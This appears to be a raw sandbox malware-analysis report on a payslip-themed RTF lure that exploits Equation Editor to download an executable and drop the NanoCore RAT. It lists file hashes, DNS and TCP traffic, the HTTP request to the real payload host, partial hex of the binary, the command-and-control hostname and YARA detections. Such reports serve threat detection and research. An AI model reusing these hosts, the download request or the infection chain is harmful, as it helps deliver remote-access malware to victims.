          SHA-512:44A500BB57B03F9231A0DBC9A1B23E76FE9895AF88B19B978C8D571DB684FD9A026070140F032B35D9B3B671E215132B626C540551A4336C691CF29CF44D20C7
          Malicious:false
          Preview:.$......,...................F............#.......$..........................................................................................................................................................................................................................................G...................j...............................................................................................................................m.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
          File Type:ISO-8859 text, with no line terminators
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:eS/t:Nl
          MD5:52934D2D1759FCB4DEECF2C1C439B781
          SHA1:6716E4DAD6831604324B826A0EDCF658070D61BC
          SHA-256:AEF219FC358B94D2BDC1DC33DD90FD67051DBAE721BA59EBA4D22965B4822521
          SHA-512:9F117522910496BF800686338A54260197B93664264ECBC46449510E90CC6B264BFD83DB935A641E21215134FCB93AC3098F6551410626135AFCE8722489F9BE
          Malicious:true
          Preview:[_L&.7.H
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Tue May 17 04:07:13 2022, length=4697, window=hide
          Category:dropped
          Size (bytes):1044
          Entropy (8bit):4.56497391317657
          Encrypted:false
          SSDEEP:12:84shgXg/XAlCPCHaXRBktB/eLX+WXcf/xgiEcpUsicvbLiO8UKDtZ3YilMMEpxRj:84U/XThOMI/xfEcpEevi79Dv3qSnY7h
          MD5:889829A33523AF7814FFAF74C37B911D
          SHA1:97DFEF70DF9606EDBB66C3B87924D8265B8E9AEB
          SHA-256:817763F836F7995CCF2549A7A188D1B4877B94DEB1F18C458FEA3B9EC5BF588D
          SHA-512:C1E0FF51794C493F0A4DE3D0EFC2D697F63DC16D54138BDA8248AA705DCEBB51E411E7873DFC458888D4C01CE3C001AD0DF8C0E1406C10E596F4F2AAFD2093FE
          Malicious:false
          Preview:L..................F.... ...h....3..h....3.....i..Y............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.Y....T.( .PAYSLI~1.DOC..V......hT..hT..*...r.....'...............P.a.y.s.l.i.p._.A.P.R._.2.0.2.2...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\Payslip_APR_2022.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.s.l.i.p._.A.P.R._.2.0.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9...N....
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):83
          Entropy (8bit):4.7319334500825265
          Encrypted:false
          SSDEEP:3:bDuMJltBV684d2mX1OCV684d2v:bCmjNrWNF
          MD5:2831989D8335FE903CB741E5921C3267
          SHA1:1674E4C3CC8CDEE4CE5E45D81258EB0640F13CD9
          SHA-256:B58A5DC407E699B2A35FAC29F4AA7D8486FFEE9600C1E244492ED52BC95A852F
          SHA-512:6EEA566A7746462C7BA5A7C7926E707F2EAD124691D223ECCAFA822FBC80540BD25F58D6564BC4D1784131BB173089AE208A7D674FED05A254FE9C2E5537B688
          Malicious:false
          Preview:[folders]..Templates.LNK=0..Payslip_APR_2022.LNK=0..[doc]..Payslip_APR_2022.LNK=0..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.503835550707525
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
          MD5:C5E24006AFAC8C2659023AD09A07EB0F
          SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
          SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
          SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
          Malicious:false
          Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):328454
          Entropy (8bit):7.939038375304377
          Encrypted:false
          SSDEEP:6144:ZYa6V3+v+HtdlL29jQwnq/c3Ffiy6d2W6zzHIn6pf43lYnkBItVb2slFQ6/gM:ZYD3+v2tP2Vnnq/4iy6wWazHM6FCmbtV
          MD5:F32D1F6E94DA654932E73E42F0F4773A
          SHA1:04E51BB4DEDFC85CB6D4DFCEB3BF48BF69C2A58A
          SHA-256:43F670B439EF8EA9765EF3A61E84F1997E3DFD30067DC11C3203CAF258553398
          SHA-512:654F6732AB95AAD2A8392A4359501D1758023676697C17928A891E1CE02298D93C795BE59B683F0961B2B7C15FB4C498747BD03F90FDAEFC1ED0CAA900AD37AD
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 54%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@.............................................P............................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
          File Type:PE32 executable (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):75776
          Entropy (8bit):6.193270446965403
          Encrypted:false
          SSDEEP:1536:GkUaNhhJfoI4yRkSzwxUWHQzdYgaeTcczegsWjcdOF:GWhzfOSzAezdnzMOF
          MD5:22A5EC1E72CE0D23B1598C40639BB3B2
          SHA1:44E54FBE0B56A243CFDC3BA01EC0B5D7D0252BAE
          SHA-256:525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
          SHA-512:1530704DBD2CEC6D811253FEF12995AD3BF739F1659F3C7634824EF412FB84592E33D751D1403C712FFB4BF034FFA7EF8C309C988241C92BB5D2445532653443
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 23%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cZ..';..';..';..*ik.?;..*iU.(;..*ij.U;...C..>;..';...;....j.&;....T.&;..Rich';..........................PE..L......b..........................................@..........................p...............................................!..........................................................................@............................................text...F........................... ..`.rdata...L.......N..................@..@.data...,1...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.503835550707525
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
          MD5:C5E24006AFAC8C2659023AD09A07EB0F
          SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
          SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
          SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
          Malicious:false
          Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
          File type:data
          Entropy (8bit):4.862157358144483
          TrID:
          • Rich Text Format (4004/1) 100.00%
          File name:Payslip_APR_2022.doc
          File size:4697
          MD5:c1b99cb9c9cf56fe0355737e4e5df1fa
          SHA1:c02627c990717d30ff577c6fbd6381393ade7bb1
          SHA256:425e84ac9fe60970bd317ede9d84555b1f994e9c2c102e44d6ed71e7f47797c6
          SHA512:b1fa270867d0e1fdd7e877135918ea4ff04aec8573907bd34c1623f214d0ca998f0a42e2e9e5bda261710233c45687c8d0c9c3b899baf45f3ddeaf1b3070b1c7
          SSDEEP:96:2xOgZzsrCdZrnAMZOFEQWQ9xeYvpgBIre5qH4zHemQv31GdJqnL:2ggZzKCbrAp1FcD5qfZ3YdJqL
          TLSH:BBA13A247B146943FE84A9F0C804BEA70D11F1A2D6CFAAD8379CFC610B76338496B081
          File Content Preview:{\rtF6944{\object98710885 98710885 \objemb23987517\objw1414\objh9884{\*\objdata981281 {{\bin000 {\*\objdata981281 } \enspace919567758919567758 i5n69YIDCSnJJ
          Icon Hash:e4eea2aaa4b4b4a4
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.2243.245.183.17249171802021697 05/16/22-22:07:10.242522TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4917180192.168.2.2243.245.183.172
          TimestampSource PortDest PortSource IPDest IP
          May 16, 2022 22:07:09.903712988 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:10.241198063 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.241362095 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:10.242522001 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:10.617443085 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.617469072 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.617723942 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:10.955343962 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.955367088 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.955384016 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.955403090 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:10.955564022 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.293215036 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293240070 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293257952 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293276072 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293292999 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293308973 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293325901 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293344021 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.293351889 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.293378115 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.293381929 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.293385029 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.630887985 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.630919933 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.630948067 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.630968094 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.630986929 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631006002 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631050110 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631148100 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631181955 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631201029 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631311893 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631331921 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631350994 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631369114 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631371021 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631388903 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631397009 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631400108 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631407976 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631421089 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631433964 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631452084 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.631463051 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631465912 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631468058 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631527901 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.631534100 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.632877111 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.969675064 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969707012 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969724894 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969738007 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969757080 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969774961 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969791889 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969810009 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969826937 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969840050 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969917059 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969935894 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969945908 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.969955921 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969974041 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.969979048 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.969984055 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.969989061 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.969993114 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.969996929 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970016956 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970041037 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970057964 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970132113 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970181942 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970200062 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970223904 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970237970 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970247984 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970274925 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970293045 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970312119 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970324993 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970330954 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970355034 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970360041 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970375061 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970407963 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970427036 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970447063 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970448017 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970463037 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970464945 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970479965 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970484018 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970501900 CEST4917180192.168.2.2243.245.183.172
          May 16, 2022 22:07:11.970501900 CEST804917143.245.183.172192.168.2.22
          May 16, 2022 22:07:11.970513105 CEST4917180192.168.2.2243.245.183.172
          TimestampSource PortDest PortSource IPDest IP
          May 16, 2022 22:07:09.529232025 CEST5586853192.168.2.228.8.8.8
          May 16, 2022 22:07:09.854876041 CEST53558688.8.8.8192.168.2.22
          May 16, 2022 22:07:26.034565926 CEST4968853192.168.2.228.8.8.8
          May 16, 2022 22:07:26.054728985 CEST53496888.8.8.8192.168.2.22
          May 16, 2022 22:07:43.542320967 CEST5883653192.168.2.228.8.8.8
          May 16, 2022 22:07:43.560504913 CEST53588368.8.8.8192.168.2.22
          May 16, 2022 22:08:01.295252085 CEST5013453192.168.2.228.8.8.8
          May 16, 2022 22:08:01.313983917 CEST53501348.8.8.8192.168.2.22
          May 16, 2022 22:08:18.839574099 CEST5527553192.168.2.228.8.8.8
          May 16, 2022 22:08:18.855973959 CEST53552758.8.8.8192.168.2.22
          May 16, 2022 22:08:36.822124004 CEST5991553192.168.2.228.8.8.8
          May 16, 2022 22:08:36.840698957 CEST53599158.8.8.8192.168.2.22
          May 16, 2022 22:08:55.655170918 CEST5440853192.168.2.228.8.8.8
          May 16, 2022 22:08:55.671107054 CEST53544088.8.8.8192.168.2.22
          May 16, 2022 22:09:13.943828106 CEST5010853192.168.2.228.8.8.8
          May 16, 2022 22:09:13.966025114 CEST53501088.8.8.8192.168.2.22
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          May 16, 2022 22:07:09.529232025 CEST192.168.2.228.8.8.80x51f6Standard query (0)lutanedukasi.co.idA (IP address)IN (0x0001)
          May 16, 2022 22:07:26.034565926 CEST192.168.2.228.8.8.80x1944Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          May 16, 2022 22:07:43.542320967 CEST192.168.2.228.8.8.80x219bStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          May 16, 2022 22:08:01.295252085 CEST192.168.2.228.8.8.80xbf10Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          May 16, 2022 22:08:18.839574099 CEST192.168.2.228.8.8.80x838cStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          May 16, 2022 22:08:36.822124004 CEST192.168.2.228.8.8.80x4e7aStandard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          May 16, 2022 22:08:55.655170918 CEST192.168.2.228.8.8.80x9596Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          May 16, 2022 22:09:13.943828106 CEST192.168.2.228.8.8.80xc434Standard query (0)stonecold.ddns.netA (IP address)IN (0x0001)
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          May 16, 2022 22:07:09.854876041 CEST8.8.8.8192.168.2.220x51f6No error (0)lutanedukasi.co.id43.245.183.172A (IP address)IN (0x0001)
          May 16, 2022 22:07:26.054728985 CEST8.8.8.8192.168.2.220x1944No error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          May 16, 2022 22:07:43.560504913 CEST8.8.8.8192.168.2.220x219bNo error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          May 16, 2022 22:08:01.313983917 CEST8.8.8.8192.168.2.220xbf10No error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          May 16, 2022 22:08:18.855973959 CEST8.8.8.8192.168.2.220x838cNo error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          May 16, 2022 22:08:36.840698957 CEST8.8.8.8192.168.2.220x4e7aNo error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          May 16, 2022 22:08:55.671107054 CEST8.8.8.8192.168.2.220x9596No error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          May 16, 2022 22:09:13.966025114 CEST8.8.8.8192.168.2.220xc434No error (0)stonecold.ddns.net45.132.226.1A (IP address)IN (0x0001)
          • lutanedukasi.co.id
          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.224917143.245.183.17280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          TimestampkBytes transferredDirectionData
          May 16, 2022 22:07:10.242522001 CEST2OUTGET /wp-includes/jnstp.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: lutanedukasi.co.id
          Connection: Keep-Alive
          May 16, 2022 22:07:10.617443085 CEST3INHTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Mon, 16 May 2022 09:10:41 GMT
          Accept-Ranges: bytes
          ETag: "7a6a39d1469d81:0"
          Server: Microsoft-IIS/7.5
          X-Powered-By: ASP.NET
          Date: Mon, 16 May 2022 20:07:08 GMT
          Content-Length: 328454
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 b0 03 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 b0 03 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 a2 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELOah*@6@@P.textvfh `.rdatal@@.datax@.ndata.rsrcP@@U\}t+}FEuHhBHPuuu@


          Click to jump to process

          Target ID:0
          Start time:22:07:14
          Start date:16/05/2022
          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Imagebase:0x13f5e0000
          File size:1423704 bytes
          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:2
          Start time:22:07:16
          Start date:16/05/2022
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Imagebase:0x400000
          File size:543304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:4
          Start time:22:07:21
          Start date:16/05/2022
          Path:C:\Users\user\AppData\Roaming\dll.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Roaming\dll.exe
          Imagebase:0x400000
          File size:328454 bytes
          MD5 hash:F32D1F6E94DA654932E73E42F0F4773A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Joe Sandbox ML
          • Detection: 54%, ReversingLabs
          Reputation:low

          Target ID:5
          Start time:22:07:24
          Start date:16/05/2022
          Path:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
          Imagebase:0x400000
          File size:75776 bytes
          MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
